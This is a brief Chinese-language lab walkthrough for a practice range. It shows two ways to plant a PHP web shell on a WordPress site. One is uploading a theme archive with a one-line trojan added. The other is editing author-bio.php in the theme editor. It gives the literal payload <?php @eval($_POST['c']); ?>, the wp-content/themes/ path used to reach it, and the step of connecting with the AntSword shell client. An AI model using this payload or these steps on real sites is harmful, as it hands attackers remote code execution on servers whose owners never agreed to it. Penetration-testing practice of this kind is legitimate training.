一.主题上传漏洞
来到靶场点击主题选择add new
这里有一个上传主题的地方
我们可以去网上找到wordpress主题下载一个
wordpress模板 网页设计模板 免费 免费下载 - 爱给网
下载完成后对我们有用的东西只有这一个目录,把它拖出来
点开moban目录后,创建一个php文件,写一个一句话木马
将这个目录改名为moban并且压缩
去上传
上传成功,我们去搜一下这个cms类型的绝对路径
搜索:wordpress主题上传的路径wp-content/themes/
我们去访问一下这个文件
用蚁剑连接一下
连接成功
二.编辑文件漏洞
来到主题,选择editor再选择author-bio.php
将里面的内容改为一句话木马
全部删除改为:<?php @eval($_POST['c']); ?>
改完之后记得提交
这里就是他的路径,试着访问一下,显示not found
我们把Twenty Fifteen改为twentyfifteen
发现访问到了,去用蚁剑连接一下,连接成功
